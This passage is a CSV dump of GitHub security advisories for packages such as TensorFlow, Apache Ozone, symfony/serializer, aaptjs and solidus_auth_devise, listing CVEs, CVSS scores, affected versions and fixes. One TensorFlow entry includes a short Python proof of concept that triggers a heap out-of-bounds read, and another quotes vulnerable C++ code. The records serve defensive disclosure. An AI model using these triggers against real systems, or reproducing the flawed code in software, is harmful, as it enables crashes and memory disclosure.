'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j8c8-67vp-6mx7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41227'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3712a2d3455e6ccb924daa5724a3652a86f6b585'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:47:47Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-4g7x-7vgq-3j28,2022-05-04T03:46:28Z,2021-11-02T15:42:16Z,,['CVE-2020-36376'],Vulnerability in list function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the list function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36376'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:16:41Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}" +1.4.0,GHSA-rg3m-hqc5-344v,2021-11-08T21:55:57Z,2021-11-10T18:45:55Z,,['CVE-2021-41224'],`SparseFillEmptyRows` heap OOB,"### Impact +The [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L194-L241) of `SparseFillEmptyRows` can be made to trigger a heap OOB access: + +```python +import tensorflow as tf + +data=tf.raw_ops.SparseFillEmptyRows( + indices=[[0,0],[0,0],[0,0]], + values=['sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss'], + dense_shape=[5,3], + default_value='o') +``` + +This occurs whenever the size of `indices` does not match the size of `values`. + +### Patches +We have patched the issue in GitHub commit [67bfd9feeecfb3c61d80f0e46d89c170fbee682b](https://github.com/tensorflow/tensorflow/commit/67bfd9feeecfb3c61d80f0e46d89c170fbee682b). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rg3m-hqc5-344v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41224'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/67bfd9feeecfb3c61d80f0e46d89c170fbee682b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:55:57Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-gc37-9g7f-96fx,2022-08-11T18:41:20Z,2021-11-23T18:17:50Z,,['CVE-2021-41532'],"Apache Ozone exposes OM, SCM and Datanode metadata","In Apache Ozone before 1.2.0, Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41532'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3Ce0bc6598-9669-b897-fc28-de8a896e36aa%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/8'}]","{'cwe_ids': ['CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:38:16Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}" +1.4.0,GHSA-hfm8-2q22-h7hv,2021-11-17T21:24:36Z,2021-11-15T17:39:18Z,,['CVE-2021-43561'],Cross-site Scripting in pegasus/google-for-jobs,An XSS issue was discovered in the google_for_jobs (aka Google for Jobs) extension before 1.5.1 and 2.x before 2.1.1 for TYPO3. The extension fails to properly encode user input for output in HTML context. A TYPO3 backend user account is required to exploit the vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pegasus/google-for-jobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'pegasus/google-for-jobs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43561'}, {'type': 'PACKAGE', 'url': 'https://github.com/pegasuswerbeagentur/google_for_jobs'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-015'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T19:44:37Z', 'nvd_published_at': '2021-11-10T15:15:00Z'}" +1.4.0,GHSA-2xhg-w2g5-w95x,2021-12-06T21:36:47Z,2021-11-24T21:01:23Z,,['CVE-2021-41270'],CSV Injection in symfony/serializer,"Description +----------- + +CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program opens a CSV, any cell starting with `=` is interpreted by the software as a formula and could be abused by an attacker. + +In Symfony 4.1, we've added the opt-in `csv_escape_formulas` option in `CsvEncoder`, to prefix all cells starting by `=`, `+`, `-` or `@` by a tab `\t`. + +Since then, OWASP added 2 chars in that list: +- Tab (0x09) +- Carriage return (0x0D) + +This makes our previous prefix char (Tab `\t`) part of the vulnerable characters, and [OWASP suggests](https://owasp.org/www-community/attacks/CSV_Injection) using the single quote `'` for prefixing the value. + +Resolution +---------- + +Symfony now follows the OWASP recommendations and use the single quote `'` to prefix formulas and adds the prefix to cells starting by `\t`, `\r` as well as `=`, `+`, `-` and `@`. + +The patch for this issue is available [here](https://github.com/symfony/symfony/commit/3da6f2d45e7536ccb2a26f52fbaf340917e208a8) for branch 4.4. + +Credits +------- + +We would like to thank Jake Barwell for reporting the issue and Jérémy Derussé for fixing the issue. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/serializer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.3.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/serializer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.4.35'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-2xhg-w2g5-w95x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41270'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/pull/44243'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/3da6f2d45e7536ccb2a26f52fbaf340917e208a8'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/releases/tag/v5.3.12'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3BPT4SF6SIXFMZARDWED5T32J7JEH3EP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QSREFD2TJT5LWKM6S4MD3W26NQQ5WJUP/'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:04:02Z', 'nvd_published_at': '2021-11-24T19:15:00Z'}" +1.4.0,GHSA-743r-5g92-5vgf,2021-12-03T15:20:59Z,2021-11-24T21:11:16Z,,['CVE-2021-40829'],Improper certificate management in AWS IoT Device SDK v2,"Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'aws-iot-device-sdk-v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'awsiotsdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40829'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-cpp-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/aws-c-io/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:31:36Z', 'nvd_published_at': '2021-11-23T00:15:00Z'}" +1.4.0,GHSA-q9q6-f556-gpm7,2021-11-15T14:44:13Z,2021-11-10T20:58:42Z,,['CVE-2021-43571'],Improper Verification of Cryptographic Signature in starkbank-ecdsa,"The verify function in the Stark Bank Node.js ECDSA library (ecdsa-node) 1.1.2 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43571'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-node'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-node/releases/tag/v1.1.3'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:27:14Z', 'nvd_published_at': '2021-11-09T22:15:00Z'}" +1.4.0,GHSA-86fh-j58m-7pf5,2021-11-22T19:04:02Z,2021-11-23T17:57:14Z,,['CVE-2021-36372'],Improper Privilege Management in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, Initially generated block tokens are persisted to the metadata database and can be retrieved with authenticated users with permission to the key. Authenticated users may use them even after access is revoked.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36372'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C5029c1ac-4685-8492-e3cb-ab48c5c370cf%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/1'}]","{'cwe_ids': ['CWE-273'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:04:02Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}" +1.4.0,GHSA-33xh-xch9-p6hj,2021-11-22T18:36:47Z,2021-11-23T18:17:59Z,,['CVE-2021-39233'],Incorrect Authorization in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, Container related Datanode requests of Ozone Datanode were not properly authorized and can be called by any client.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39233'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C394a9a73-44dd-b5db-84d8-607c3226eb00%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/4'}]","{'cwe_ids': ['CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:36:47Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}" +1.4.0,GHSA-4999-659w-mq36,2021-11-15T20:27:39Z,2021-11-15T23:16:49Z,,['CVE-2021-41266'],Authentication bypass issue in the Operator Console,"During an internal security audit, we detected an authentication bypass issue in the Operator Console when an external IDP is enabled. The security issue has been reported internally. We have not observed this exploit in the wild or reported elsewhere in the community at large. All users are advised to upgrade ASAP. + +### Impact + +All users on release v0.12.2 and before are affected. + +### Patches + +This issue was fixed by PR https://github.com/minio/console/pull/1217, users should upgrade to latest release. + +### Workarounds + +Add `automountServiceAccountToken: false` to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the `CONSOLE_IDP_URL`, `CONSOLE_IDP_CLIENT_ID`, `CONSOLE_IDP_SECRET` and `CONSOLE_IDP_CALLBACK` environment variable and instead use the Kubernetes service account token. + +### References + +#1217 for more information on the fix and how it was fixed. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [console issues](https://github.com/minio/console/issues) +* Email us at [security@minio.io](mailto:security@minio.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/minio/console'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41266'}, {'type': 'WEB', 'url': 'https://github.com/minio/console/pull/1217'}, {'type': 'PACKAGE', 'url': 'https://github.com/minio/console'}]","{'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T20:27:39Z', 'nvd_published_at': '2021-11-15T21:15:00Z'}" +1.4.0,GHSA-7r94-xv9v-63jw,2021-11-08T21:53:17Z,2021-11-10T18:44:11Z,,['CVE-2021-41225'],A use of uninitialized value vulnerability in Tensorflow,"### Impact +TensorFlow's Grappler optimizer has a [use of unitialized variable](https://github.com/tensorflow/tensorflow/blob/3457a2b122e50b4d44ceaaed5a663d635e5c22df/tensorflow/core/grappler/optimizers/auto_parallel.cc#L155-L164): + +```cc + const NodeDef* dequeue_node; + for (const auto& train_node : train_nodes) { + if (IsDequeueOp(*train_node)) { + dequeue_node = train_node; + break; + } + } + + if (dequeue_node) { + ... + } +``` + +If the `train_nodes` vector (obtained from the saved model that gets optimized) does not contain a `Dequeue` node, then `dequeue_node` is left unitialized. + +### Patches +We have patched the issue in GitHub commit [68867bf01239d9e1048f98cbad185bf4761bedd3](https://github.com/tensorflow/tensorflow/commit/68867bf01239d9e1048f98cbad185bf4761bedd3). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Qian Feng from Baidu Security Team. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7r94-xv9v-63jw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41225'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/68867bf01239d9e1048f98cbad185bf4761bedd3'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-908'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:53:17Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-r496-7hgp-53wf,2022-05-04T03:45:56Z,2021-11-02T15:42:24Z,,['CVE-2020-36377'],Vulnerability in dump function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the dump function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36377'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:20:42Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}" +1.4.0,GHSA-gp2f-254m-rh32,2021-11-08T21:31:39Z,2021-11-10T16:51:41Z,,['CVE-2021-41251'],Unauthorized access to data in @sap-cloud-sdk/core,"### Impact +This affects applications on SAP Business Technology Platform that use the SAP Cloud SDK and enabled caching of destinations. +In some cases, when user information was missing, destinations were cached without user information, allowing other users to retrieve the same destination with its permissions. +By default, destination caching is disabled. If it is enabled the maximum lifetime is 5 minutes which limits the attack vector. + +### Patches +The problem was fixed by #1769 and #1770. The security for caching has been increased. The changes are released in version 1.52.0. + +### Workarounds +Disable destination caching (it is disabled by default). + +### References +[destination cache API docs](https://sap.github.io/cloud-sdk/api/1.51.0/modules/sap_cloud_sdk_core#destinationCache) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in https://github.com/SAP/cloud-sdk-js","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@sap-cloud-sdk/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.52.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/SAP/cloud-sdk-js/security/advisories/GHSA-gp2f-254m-rh32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41251'}, {'type': 'WEB', 'url': 'https://github.com/SAP/cloud-sdk-js/pull/1769'}, {'type': 'WEB', 'url': 'https://github.com/SAP/cloud-sdk-js/pull/1770'}, {'type': 'PACKAGE', 'url': 'https://github.com/SAP/cloud-sdk-js'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:31:39Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-mcxr-fx5f-96qq,2021-11-22T18:30:27Z,2021-11-23T18:18:35Z,,['CVE-2021-22969'],Server-Side Request Forgery in Concrete CMS,Concrete CMS (formerly concrete5) versions below 8.5.7 has a SSRF mitigation bypass using DNS Rebind attack giving an attacker the ability to fetch cloud IAAS (ex AWS) IAM keys.To fix this Concrete CMS no longer allows downloads from the local network and specifies the validated IP when downloading rather than relying on DNS.Discoverer.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22969'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1369312'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:30:27Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}" +1.4.0,GHSA-xm34-v85h-9pg2,2021-11-17T19:57:48Z,2021-11-18T20:09:32Z,,['CVE-2021-41274'],Authentication Bypass by CSRF Weakness,"### Impact +CSRF vulnerability that allows user account takeover. + +All applications using any version of the frontend component of `solidus_auth_devise` are affected if `protect_from_forgery` method is both: +- Executed whether as: + - A `before_action` callback (the default) + - A `prepend_before_action` (option `prepend: true` given) before the `:load_object` hook in `Spree::UserController` (most likely order to find). +- Configured to use `:null_session` or `:reset_session` strategies (`:null_session` is the default in case the no strategy is given, but `rails --new` generated skeleton use `:exception`). + +That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. + +### Patches +Users should promptly update to `solidus_auth_devise` version `2.5.4`. + +### Workarounds +A couple of options: + +- If possible, change your strategy to `:exception`: + ```ruby + class ApplicationController < ActionController::Base + protect_from_forgery with: :exception + end + ``` + +- Add the following to `config/application.rb` to at least run the `:exception` strategy on the affected controller: + ```ruby + config.after_initialize do + Spree::UsersController.protect_from_forgery with: :exception + end + ``` + +- We've also released new Solidus versions monkey patching `solidus_auth_devise` with the quick fix. Those versions are `v3.1.3`, `v.3.0.3` & `v2.11.12`. See [GHSA-5629-8855-gf4g](https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g) for details. + +### References +- [CSRF on the Rails guides](https://guides.rubyonrails.org/security.html#cross-site-request-forgery-csrf) +- [Solidus security](https://solidus.io/security/) + +### Thanks +We'd like to thank [vampire000](https://hackerone.com/vampire000) for reporting this issue. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [solidus_auth_devise](https://github.com/solidusio/solidus_auth_devise/issues) or a discussion in [solidus](https://github.com/solidusio/solidus/discussions) +* Email us at [security@solidus.io](mailto:security@soliidus.io) +* Contact the core team on [Slack](http://slack.solidus.io/) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'solidus_auth_devise'}, 'ranges': [{'type': 